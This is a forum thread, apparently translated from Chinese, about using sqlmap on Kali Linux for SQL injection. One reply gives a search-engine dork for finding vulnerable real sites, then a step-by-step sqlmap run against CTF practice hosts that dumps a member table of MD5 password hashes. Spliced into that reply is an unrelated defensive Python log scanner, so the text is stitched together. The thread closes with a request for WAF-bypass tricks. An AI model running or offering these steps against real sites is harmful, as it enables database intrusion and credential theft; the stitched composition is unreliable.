I recently installed a Kali Linux virtual machine and want to use the sqlmap tool inside it to do SQL injection. Please take a look, sorry for the trouble; it would be best if you could give source code.
CodePudding user response:
Doing SQL injection with sqlmap! Urgent help needed!!!!!!!!!!!!
CodePudding user response:
Search target sites: baidu: inurl: asp? Id==1
sqlmap -u "url"
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1"
sqlmap -u "url" --dbs
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dbs
sqlmap -u "url" -D databasename --tables
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables
sqlmap -u "url" -D dbname -T tablename --columns
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T news --columns
Practice on www.mozhe.cn:
View source: 219.153.49.228:48399 => new_list.php?id=1
sqlmap -u "http://219.153.49.228:48399/new_list.php?id=1" --dbs (scan the databases)
Available databases: information_schema, mysql, performance_schema, stormgroup, test;
Web: PHP 5.6.39, MySQL >= 5.0.0
sqlmap -u "http://219.153.49.228:48399/new_list.php?id=1" -D stormgroup --tables (detect all tables; multiple threads can be selected to go faster)
=> member, notice
sqlmap -u "http://219.153.49.228:48399/new_list.php?id=1" -D stormgroup -T member --dump (export the table contents)
=> name, password, status:
+-------+--------+----------------------------------+
| name  | status | password                         |
+-------+--------+----------------------------------+
| mozhe | 0      | 3114b433dece9180717f2b7de56b28a3 |
| mozhe | 1      | b2408366889e147e847ddb81c7d0004d |
+-------+--------+----------------------------------+
Md5crack mozhe 1:50 2550, input after landing, the key:
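For the defending side, the enumeration steps in the reply above leave recognizable traces in web server access logs. The following is an added example, not part of the original post: a scanner that flags the default sqlmap User-Agent and information_schema enumeration in request URLs. The log lines, IP addresses and the names `scan`, `LINE_RE`, `ENUM_RE` and `STAGE` are constructed for illustration; it assumes combined log format and a MySQL >= 5.0 back end, where --dbs, --tables and --columns read from information_schema.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /new_list.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /new_list.php?id=1%20AND%205%3D5 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
203.0.113.5 - - [01/Jan/2024:10:00:06 +0000] "GET /new_list.php?id=1%20UNION%20ALL%20SELECT%20schema_name%20FROM%20INFORMATION_SCHEMA.SCHEMATA HTTP/1.1" 200 900 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
192.0.2.44 - - [01/Jan/2024:10:02:00 +0000] "GET /new_list.php?id=1+UNION+SELECT+table_name+FROM+information_schema.tables HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client IP, method, request target, status, User-Agent
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"'
)
# Metadata tables read while enumerating a MySQL server.
ENUM_RE = re.compile(
    r"\bfrom\s+information_schema\.(schemata|tables|columns)\b", re.I
)
STAGE = {
    "schemata": "database listing (--dbs)",
    "tables": "table listing (--tables)",
    "columns": "column listing (--columns)",
}


def scan(log_text):
    """Return {client_ip: sorted findings} for requests that look like sqlmap."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not combined log format, skip
        ip, _method, target, _status, agent = m.groups()
        hits = set()
        # The User-Agent can be changed by the client, so it is only one signal.
        if agent.lower().startswith("sqlmap/"):
            hits.add("default sqlmap User-Agent")
        # Payloads arrive percent-encoded; decode before matching keywords.
        for m_enum in ENUM_RE.finditer(unquote_plus(target)):
            hits.add(STAGE[m_enum.group(1).lower()])
        if hits:
            findings.setdefault(ip, set()).update(hits)
    return {ip: sorted(h) for ip, h in findings.items()}


if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(hits))
```

Injection through POST bodies or cookies does not appear in the request line, so this check only covers GET parameters like the `id` parameter used in the thread.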
CodePudding user response:
Very detailed, thank you!!!!!
CodePudding user response:
Quoting tailsgao's reply on the second floor:
But when doing SQL injection with sqlmap, how do you bypass the WAF protection in CTF challenges, for example keyword bypass?